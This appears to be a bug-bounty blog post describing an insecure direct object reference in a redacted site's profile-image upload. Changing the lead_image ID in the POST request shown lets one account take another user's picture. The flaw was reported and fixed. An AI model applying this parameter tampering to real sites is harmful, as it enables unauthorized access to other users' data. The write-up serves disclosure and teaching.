Open in app

Sign in

Write

Sign in

A Story of IDOR which leads to privacy violation…$$$

Amit Kumar Biswas @Amitlt2
2 min readDec 4, 2021

--

Hello Hackers!!

Welcome Back to my other Blog.

The story upon an Insecure direct object references (IDOR) Vulnerability. Let’s understand an introduction of an IDOR.

According to Port-Swigger,

Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.

Let’s Understand the Scenario….

During testing, I discovered a File-Uploading Functionality when as a Victim I upload my DP into web-app then I saw there was a parameter for submitting a request which was lead_image=6109.

Now I created another account as an Attacker and Upload my Dp then I saw the lead_image parameter id has been changed into 6110.

As an attacker, I changed the parameter 6110 into 6109. And suddenly my Dp has been changed into Victim Dp.

Request:

POST /cms/pages/2913/edit/ HTTP/2
Host: Redacted.com
Cookie: {Your’s Cookie}
User-Agent: {Your’s Info}
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, image/avif, image/webp, */*;q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: https://Vulnerable.Redacted.com/cms/pages/2913/edit/
Content-Type: application/x-www-from-urlencoded
Content-Length: 240
Origin: https://Vulnerable.Redacted.com
Upgraded-insecure-Request: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: 71
Te: trailers

csrfmiddlewaretoken=anaiamamidw9292992 nnenfunenfnenfue93nnn&next=&slug=Attacker+profile&lead_image=6109&bio=&Location=&website=&action-submit=Submit+to+Moderators+approval

Successfully I’m able to change my Dp into Victim Dp.

Thank You Hackers for taking time to read my write-up.

BUG REPORTED

STATUS FIXED

ACK. & SWAG

Specially Thanks to Ahmad Halabi for guiding me…

Follow me:

Instagram

Twitter

Facebook

LinkedIn

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Cybersecurity
Bug Bounty
Red Team
Bugcrowd
Pentesting

--

--

Amit Kumar Biswas @Amitlt2
Amit Kumar Biswas @Amitlt2

Written by Amit Kumar Biswas @Amitlt2

274 Followers
19 Following

Cyber Security Analyst at @avalanceGlobalSolutions | Security Researcher in | Cyber Security Researcher in Microsoft & Bugcrowd | R&D in Smart Contract |

Responses (2)

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams